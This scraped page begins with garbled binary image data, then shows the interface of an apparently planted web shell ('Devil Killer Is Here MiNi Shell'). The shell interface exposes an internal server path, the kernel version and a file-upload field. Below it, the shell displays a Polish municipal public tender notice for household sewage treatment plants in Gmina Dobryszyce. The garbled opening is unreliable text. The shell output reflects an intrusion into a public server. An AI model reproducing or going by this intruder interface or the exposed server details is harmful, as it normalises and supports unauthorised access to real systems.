JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220428/0013884001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „ Budowa przydomowych biologicznych oczyszczalni ścieków realizowanych na terenie Gminy Dobryszyce ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Dobryszyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590647977</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolności 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobryszyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-505</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">44 681 11 93</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">44 681 10 28</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@dobryszyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://dobryszyce.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Umowy ramowej </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ Budowa przydomowych biologicznych oczyszczalni ścieków realizowanych na terenie Gminy Dobryszyce ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96d2824b-c6d3-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00138840</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00038672/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa przydomowych biologicznych oczyszczalni ścieków realizowanych na terenie Gminy Dobryszyce.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.17.) Tryb zawarcia umowy ramowej wraz z podstawą prawną</h3> <p class="mb-0"> Umowa ramowa udzielana jest w trybie podstawowym na podstawie: art. 311 ust. 1 pkt 2 ustawy w zw. z art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://dobryszyce.biuletyn.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: „ Formularz do złożenia, zmiany, wycofania oferty lub wniosku ” oraz „ Formularz do komunikacji ”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, <br/> elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich <br/> użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach <br/> korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>System teleinformatyczny, o którym mowa powyżej, spełnia wymagania określone w Pzp w <br/> szczególności w art. 64 i 69 Pzp oraz w § 11 Rozporządzenia Prezesa Rady Ministrów z dnia 30 <br/> grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań <br/> technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w <br/> postępowaniu o udzielenie zamówienia publicznego lub konkursie. <br/>Do połączenia z systemem używany jest szyfrowany protokół HTTPS. Szyfrowanie danych <br/> odbywa się przy pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych <br/> przesyłanych przez Internet. Każdy wykonawca posiada w systemie dostęp do możliwości <br/> złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na zadawanie pytań <br/> do treści SWZ oraz komunikację z zamawiającym w pozostałych obszarach.<br/>Wymagania techniczne, które muszą spełniać urządzenia informatyczne w celu korzystania z <br/> systemu teleinformatycznego opisane zostały na stronie internetowej pod adresem: <br/> miniportal.uzp.gov.pl/Warunki usługi.<br/>Dopuszczalne formaty przesyłanych danych:<br/>image/bmp, image/x-windows-bmp, application/msword, application/drafting, image/gif, application/x-compressed, application/x-gzip, multipart/x-gzip, image/jpeg, image/pjpeg, <br/>application/x-latex, application/pdf, image/pict, image/png, application/mspowerpoint, application/postscript, application/rtf, application/x-rtf, text/richtext, image/tiff, image/x-tiff, application/mswrite, application/excel, application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml, application/x-zip-compressed, application/zip, application/vnd.ms-office, image/x-ms-bmp, video/x-msvideo, audio/x-ms-wma, application/vnd.oasis.opendocument.spreadsheet, application/acad, application/x-acad, application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg, application/x-autocad, image/vnd.dwg, drawing/dwg, XadES (XML Advanced Electronic Signatures), PadES (PDF Advanced Electronic Signatures), CadES (CMS Advanced Electronic Signatures).<br/><br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: <br/> „ Formularz złożenia, zmiany, wycofania oferty lub wniosku ” i „ Formularza do <br/> komunikacji ” wynosi 150 MB.<br/><br/>Wykonawca składa ofertę za pośrednictwem „ Formularza do złożenia, zmiany, wycofania oferty lub wniosku ” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „ Instrukcji użytkownika ”, dostępnej na stronie: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.13. Zamawiający przewiduje pobranie ze złożonych katalogów elektronicznych danych potrzebnych do sporządzenia ofert dostosowanych do wymagań danego zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z RODO tj. rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1).<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej<br/> „ RODO ”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Gmina Dobryszyce reprezentowana przez Wójta Gminy.<br/>Dane tele-adresowe Zamawiającego:<br/>Gmina Dobryszyce ul. Wolności 8, 97-505 Dobryszyce<br/>Adres e-mail: gmina@dobryszyce.pl<br/>Tel. 44/ 681 11 93<br/>▪ Inspektorem Ochrony Danych Osobowych w Gminie Dobryszyce jest pani Magdalena <br/> Kuszmider tel. 607 770 718, e-mail: magdalena@kuszmider.com.pl.<br/>▪ Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym <br/> w trybie podstawowym pn.: „ Budowa przydomowych biologicznych oczyszczalni ścieków <br/> realizowanych na terenie Gminy Dobryszyce ”- Znak sprawy: 271.1.5.2022.<br/>Pozostałe informacje dot. RODO zawarte zostały w pkt 22 rozdział I SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.1.5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: Budowa przydomowych biologicznych oczyszczalni ścieków <br/> realizowanych na terenie Gminy Dobryszyce.<br/>Przedmiotem zamówienia są roboty budowlane, polegające na dostawie, montażu i uruchomieniu <br/> przydomowych biologicznych oczyszczalni ścieków ( PBOŚ) o przepustowości do 5 m3/d, <br/> spełniających wymogi normy PN-EN 12566-3:2005+A2:2013 lub równoważnej. <br/> Dostarczane urządzenia mają być kompletnymi, fabrycznie nowymi produktami.<br/>W ramach zadania wykonanych zostanie:<br/> ● 24 przydomowych oczyszczalni o minimalnej przepustowości 0,75 m3/d – do obsługi <br/> 1-5 osób – Typ I,<br/> ● 5 przydomowych oczyszczalni o minimalnej przepustowości 1,30 m3/d – do obsługi <br/> 6-9 osób – Typ II.<br/>Szczegółowy opis przedmiotu zamówienia oraz podstawowe ( parametry ) techniczne <br/> projektowanych przydomowych oczyszczalni ścieków zostały określone w Projekcie <br/> Budowlanym – Rozdział V do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru oferty najkorzystniejszej spośród ofert nie odrzuconych na <br/> podstawie art. 226 Pzp. <br/>2. Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującym <br/> kryterium:<br/> <br/>Cena ( C )	- 100% ( 100 pkt )<br/><br/>3. Kryterium „ Cena ” ( C ) będzie rozpatrywane na podstawie łącznego wynagrodzenia brutto <br/> za wykonanie całego przedmiotu zamówienia, podanego przez Wykonawcę w Formularzu <br/> ofertowym stanowiącym załącznik nr 1 do SWZ. W kryterium „ Cena ” ( C ) <br/> Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik ( Cenę ). <br/> Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru:<br/><br/>Liczba <br/>zdobytych ( C ) = Cn/Cb x 100 x waga kryterium 100%<br/>punktów <br/><br/>gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100 – wskaźnik stały<br/>100% – procentowe znaczenie kryterium ceny<br/><br/>4. Liczba punktów, którą można uzyskać w ramach kryterium „ cena ” obliczona zostanie przez <br/> podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej <br/> liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%.<br/>5. Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez <br/> Wykonawców w zakresie w/w kryterium. Oferta wypełniająca w najwyższym stopniu <br/> wymagania określone w powyższym kryterium otrzyma maksymalną liczbę punktów.<br/> Pozostałym Wykonawcom, spełniającym wymagania kryterialne przypisana zostanie <br/> odpowiednio mniejsza ( proporcjonalnie mniejsza ) liczba punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące :<br/>a) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika <br/> to z odrębnych przepisów:<br/> Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>c) sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>d) zdolności technicznej lub zawodowej.<br/>Wykonawca spełni warunek, jeżeli wykaże w zakresie zdolności technicznej, że:<br/> a) wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/> prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną inwestycję<br/> ( w ramach jednego kontraktu/umowy ), obejmującą budowę minimum 25 sztuk <br/> przydomowych oczyszczalni ścieków, wraz z podaniem ich rodzaju, wartości, daty i <br/> miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz <br/> załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, <br/> przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone <br/> przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z <br/> przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne <br/> odpowiednie dokumenty. <br/>Uwaga!<br/>Wykonawca składając ofertę wykazuje doświadczenie pod warunkiem, że z treści wypełnionego Załącznika nr 4 do IDW i załączonych przez Wykonawcę do niego referencji bądź innych dokumentów wystawionych przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty, będzie jednoznacznie z nich wynikać zakres rzeczowy odpowiadający spełnieniu warunków udziału w postępowaniu. <br/>Wykonawca potwierdza spełnianie warunku udziału w pierwszej kolejności poprzez złożenie wraz z ofertą Oświadczenia własnego, o którym mowa w 7.1 IDW.<br/> Informacje dodatkowe:<br/> Dla potrzeb oceny spełnienia warunków udziału w postępowaniu z pkt 6.1. ppkt 1 lit. a), <br/> jeżeli wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni <br/> kurs PLN do tej waluty podawany przez NBP w oparciu o tabelę średnich kursów walut <br/> obcych, na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień <br/> Publicznych.<br/><br/>Wykonawca spełni warunek, jeżeli wykaże w zakresie zdolności zawodowej, że:<br/><br/> - dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj.: <br/> osobami posiadającymi kwalifikacje zawodowe i wykształcenie wymagane przepisami <br/> prawa budowlanego w specjalnościach adekwatnych do wykonywanego zakresu w <br/> poszczególnych branżach tj.: <br/> <br/> a) dysponuje 1 osobą, która pełnić będzie funkcję kierownika budowy w specjalności<br/> instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,<br/> gazowych, wodociągowych i kanalizacyjnych, posiadającą określone przepisami Prawa <br/> Budowlanego ( t.j. Dz. U. z 2020 r., poz. 1333 ze zm. ) i rozporządzenia Ministra Inwestycji i <br/> Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania <br/> samodzielnych funkcji technicznych w budownictwie ( Dz. U. z 2019 r. poz. 831 ) <br/> uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i <br/> urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wraz <br/> z przynależnością do właściwej Izby Samorządu Zawodowego Inżynierów Budownictwa w <br/> rozumieniu ustawy z dnia 15 grudnia 2000 roku o samorządach zawodowych architektów <br/> oraz inżynierów budownictwa ( t.j. Dz. U. z 2019 r., poz. 1117) lub równoważne <br/> odpowiadające im uprawnienia budowlane do kierowania robotami budowlanymi, które <br/> zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/><br/> b) dysponuje 1 osobą, która pełnić będzie funkcję kierownika robót w branży elektrycznej <br/> posiadającą określone przepisami Prawa Budowlanego ( t.j. Dz. U. z 2020 r., poz. 1333 ze <br/> zm. ) i rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie <br/> przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w <br/> budownictwie ( Dz. U. z 2019 r. poz. 831 ) uprawnienia budowlane w specjalności <br/> instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i <br/> elektroenergetycznych, wraz z przynależnością do właściwej Izby Samorządu <br/> Zawodowego Inżynierów Budownictwa w rozumieniu ustawy z dnia 15 grudnia 2000 roku <br/> o samorządach zawodowych architektów oraz inżynierów budownictwa ( t.j. Dz. U. z 2019 <br/> r., poz. 1117) lub równoważne odpowiadające im uprawnienia budowlane do kierowania <br/> robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących <br/> przepisów. <br/>Uwaga!<br/>Wykonawca spełni warunek, o którym mowa pkt 2 lit. a-b) jeżeli będzie posiadał lub dysponował osobą, która posiada wszystkie uprawnienia łącznie lub dwoma osobami posiadającymi wymagane uprawnienia. Zamawiający nie wymaga by Wykonawca wykazał się posiadaniem dwóch osób pełniących wskazane funkcje we wskazanych wyżej specjalnościach, w sytuacji gdy uprawnienia te posiada np. jedna osoba wskazane przez Wykonawcę. Warunek stawiany przez Zamawiającego dotyczy uprawnień nie zaś liczby osób spełniających te warunki. <br/><br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/> doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na <br/> zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji <br/> których te zdolności są wymagane.<br/><br/>W przypadku, o którym mowa w pkt 6.2., wykonawcy wspólnie ubiegający się <br/> o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty <br/> budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Formularz oświadczenia <br/> stanowi załącznik nr 3 do IDW. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe na potwierdzenie niepodlegania wykluczeniu nie są wymagane.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w <br/>postępowaniu: <br/><br/> a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli <br/> okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, <br/> wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały <br/> wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały <br/> wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/> dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały <br/> wykonane, a jeżeli wykonawca z 